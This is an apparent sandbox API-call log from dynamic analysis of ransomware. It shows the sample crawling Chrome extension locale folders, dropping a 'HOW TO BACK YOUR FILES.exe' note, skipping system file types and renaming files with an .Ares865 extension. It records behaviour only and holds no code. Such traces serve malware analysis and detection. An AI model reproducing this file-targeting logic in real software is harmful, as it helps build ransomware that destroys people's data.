ftLastAccessTime.dwLowDateTime=0x4e3aaaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3aaaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.015] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.015] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.015] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.015] lstrlenW (lpString="messages.json") returned 13 [0101.015] lstrlenW (lpString="Ares865") returned 7 [0101.015] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.015] lstrlenW (lpString=".dll") returned 4 [0101.015] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0101.015] lstrlenW (lpString=".lnk") returned 4 [0101.016] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0101.016] lstrlenW (lpString=".ini") returned 4 [0101.016] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0101.016] lstrlenW (lpString=".sys") returned 4 [0101.016] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0101.016] lstrlenW (lpString="messages.json") returned 13 [0101.016] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.Ares865") returned 160 [0101.016] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.017] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.017] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=256) returned 1 [0101.020] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es" [0101.021] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es" [0101.021] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.021] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.021] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.022] GetLastError () returned 0x0 [0101.022] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.022] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3aaaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3aaaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.022] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.022] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.022] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.022] lstrlenW (lpString="messages.json") returned 13 [0101.022] lstrlenW (lpString="Ares865") returned 7 [0101.022] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.022] lstrlenW (lpString=".dll") returned 4 [0101.022] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0101.022] lstrlenW (lpString=".lnk") returned 4 [0101.022] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0101.022] lstrlenW (lpString=".ini") returned 4 [0101.022] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0101.022] lstrlenW (lpString=".sys") returned 4 [0101.022] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0101.022] lstrlenW (lpString="messages.json") returned 13 [0101.023] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.Ares865") returned 160 [0101.023] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.024] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=269) returned 1 [0101.030] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en" [0101.031] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en" [0101.031] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.031] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.031] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.032] GetLastError () returned 0x0 [0101.032] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.032] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3aaaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3aaaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.032] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.032] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.032] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.032] lstrlenW (lpString="messages.json") returned 13 [0101.032] lstrlenW (lpString="Ares865") returned 7 [0101.032] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.032] lstrlenW (lpString=".dll") returned 4 [0101.032] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0101.032] lstrlenW (lpString=".lnk") returned 4 [0101.032] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0101.032] lstrlenW (lpString=".ini") returned 4 [0101.032] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0101.032] lstrlenW (lpString=".sys") returned 4 [0101.032] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0101.032] lstrlenW (lpString="messages.json") returned 13 [0101.033] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.Ares865") returned 160 [0101.033] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.034] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.034] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=215) returned 1 [0101.038] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el" [0101.038] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el" [0101.038] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.038] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.039] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.039] GetLastError () returned 0x0 [0101.039] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.039] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3aaaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3aaaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.040] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.040] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.040] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.040] lstrlenW (lpString="messages.json") returned 13 [0101.040] lstrlenW (lpString="Ares865") returned 7 [0101.040] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.040] lstrlenW (lpString=".dll") returned 4 [0101.040] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0101.040] lstrlenW (lpString=".lnk") returned 4 [0101.040] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0101.040] lstrlenW (lpString=".ini") returned 4 [0101.040] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0101.040] lstrlenW (lpString=".sys") returned 4 [0101.040] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0101.040] lstrlenW (lpString="messages.json") returned 13 [0101.040] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.Ares865") returned 160 [0101.040] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.042] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=332) returned 1 [0101.046] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de" [0101.046] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de" [0101.046] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0101.046] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\how to back your files.exe"), bFailIfExists=1) returned 0 [0101.047] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0101.047] GetLastError () returned 0x0 [0101.047] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0101.047] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e3d0c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e3d0c00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0101.048] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.048] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0101.048] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0101.048] lstrlenW (lpString="messages.json") returned 13 [0101.048] lstrlenW (lpString="Ares865") returned 7 [0101.048] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0101.048] lstrlenW (lpString=".dll") returned 4 [0101.048] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0101.048] lstrlenW (lpString=".lnk") returned 4 [0101.048] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0101.048] lstrlenW (lpString=".ini") returned 4 [0101.048] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0101.048] lstrlenW (lpString=".sys") returned 4 [0101.048] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0101.048] lstrlenW (lpString="messages.json") returned 13 [0101.048] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.Ares865") returned 160 [0101.048] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.ares865"), dwFlags=0x1) returned 1 [0101.049] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0101.050] GetFileSizeEx (in: 